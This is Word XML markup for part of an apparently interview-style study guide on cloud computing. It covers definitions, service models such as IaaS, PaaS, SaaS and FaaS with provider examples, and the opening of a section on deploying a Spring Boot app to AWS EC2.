    <w:p w14:paraId="7CEC3F70" w14:textId="1B1CF4B0" w:rsidR="009B11FE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B11FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6D1D60F1">
          <v:rect id="_x0000_i3690" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD27A67" w14:textId="5A124029" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00E57C3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="910" w:name="_Toc197868124"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is cloud computing</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="910"/>
    </w:p>
    <w:p w14:paraId="1A744C0C" w14:textId="57DBB78D" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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Cloud computing</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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246F6A">
          <v:rect id="_x0000_i3691" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5FC840"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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48923E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On-demand self-service</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Access resources like storage and computing power without human interaction with the service provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6B18F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Broad network access</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Services are available over the network and accessed through standard mechanisms (like browsers or APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9449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esource pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resources (CPU, storage, etc.) are pooled and shared among multiple users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B87F82"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apid elasticity</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resources can be scaled up or down automatically based on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5900A2B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Measured service</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Usage is monitored and billed based on consumption (pay-as-you-go model).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E97CE"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32560">
          <v:rect id="_x0000_i3692" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C26718"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Types of Cloud Computing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9D278"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ublic Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Services offered over the public internet (e.g., AWS, Azure, Google Cloud).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540C1BC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rivate Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Cloud infrastructure operated solely for a single organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F91DD5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Hybrid Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – A mix of public and private clouds that allows data and apps to move between the two.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4E96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DB50F">
          <v:rect id="_x0000_i3693" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE43776" w14:textId="77777777" w:rsidR="00C632D7" w:rsidRDefault="00C632D7" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDA36D5" w14:textId="2344A114"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lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cloud Service Models:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6776683C"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IaaS (Infrastructure as a Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Provides virtualized computing resources over the internet.</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AWS EC2, Azure Virtual Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4489C480"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aaS (Platform as a Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Provides a platform to develop, run, and manage application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oogle App Engine, Azure App Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74444241"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SaaS (Software as a Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Delivers software applications over the internet on a subscription basi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mail, Microsoft 365, Salesforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEBD0F"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7CA7A">
          <v:rect id="_x0000_i3694" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F97D59F"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Benefits of Cloud Computing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB014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Cost-efficient (no need for heavy upfront hardware investment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C52A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calable and elastic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B15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High availability and reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0B108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Enables remote work and collaboration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058570C0"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implifies disaster recovery and backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA2D1FA" w14:textId="60774105" w:rsidR="000417BC" w:rsidRPr="00CE4B95"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695" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9258A0" w14:textId="47804BDF" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00954F7F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="911" w:name="_Toc197868125"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain services provided by cloud computing</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="911"/>
    </w:p>
    <w:p w14:paraId="32922C19" w14:textId="0C03FB38"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 computing provides a variety of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> categorized mainly into three broad service models, and each comes with its own set of functionalities. Here's a detailed explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB2859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5B5A63">
          <v:rect id="_x0000_i3696" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BAADE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Infrastructure as a Service (IaaS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAEEA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virtualized hardware resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over the internet such as servers, storage, and networking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A4AA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5CBE60B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Hosting websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E918F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eating virtual machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014173A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etting up development and test environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FDBF8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FA9884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EC2 (AWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE79E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ompute Engine (GCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7E9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC908C5"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6B18">
          <v:rect id="_x0000_i3697" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6228F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Platform as a Service (PaaS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB26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Offers a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>platform with tools and services</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to develop, test, and deploy applications without managing underlying infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A275E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6192AE4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Building scalable web apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335F9C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eveloping mobile backends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCCC9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PI development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E00BF2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DB1106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App Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCF413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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6604E5B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roku</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED937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C468EF">
          <v:rect id="_x0000_i3698" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="094025D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Software as a Service (SaaS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF84D2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Delivers </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fully functional software</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications over the internet, managed by the provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB46C7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10B109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mail services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C1E8B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M systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A89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File sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7343404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760662D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mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B04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alesforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B31C0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Office 365</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D482ECF"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8459">
          <v:rect id="_x0000_i3699" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538A05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Function as a Service (FaaS) / Serverless:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C7E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Executes </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>individual functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or pieces of code in response to events. No need to manage servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E28F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4286173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vent-driven processing (e.g., image uploads, API calls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34AAF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58906CD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7AD935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Lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FAFC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5D50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unctions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138A71F2"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416FC">
          <v:rect id="_x0000_i3700" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="414202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Storage Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75C49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scalable and durable storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D038D9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C5B2D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S3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED4CF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Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE3B7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p>
    <w:p w14:paraId="092BB2ED"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2946A">
          <v:rect id="_x0000_i3701" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BE338"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Database Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8D33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based </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>managed database</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offerings (SQL/NoSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C49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8B5FE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RDS / DynamoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC1ED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p>
    <w:p w14:paraId="23677E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irestore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B030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4A2AB">
          <v:rect id="_x0000_i3702" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="428EE7C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Networking Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E696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cludes services like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>virtual networks, load balancers, VPNs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CDNs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FF53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42FF4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VPC, ELB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647A39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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055B305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flare (CDN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B6A8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C12CD9">
          <v:rect id="_x0000_i3703" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C138C5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DevOps &amp; Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC06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CI/CD pipelines, code repositories, logging, and monitoring tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7382F02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143164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CodePipeline / CloudWatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA78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p>
    <w:p w14:paraId="5D9BCDB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Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA368D" w14:textId="0C9E0887"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704" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900F6BF" w14:textId="02A53D3B" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00372A8C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="912" w:name="_Toc197868126"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to deploy service to AWS</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="912"/>
    </w:p>
    <w:p w14:paraId="71687F1A" w14:textId="3BF3B719" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00D530AD"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To deploy a service to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use several options depending on your architecture (e.g., web app, microservice, containerized app). Below is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>step-by-step guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the most commonly used methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E1076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11B91">
          <v:rect id="_x0000_i3705" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4BC5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Deploying a Java Spring Boot App to AWS EC2 (Traditional VM deployment)</w:t>
      </w:r>
    </w:p>
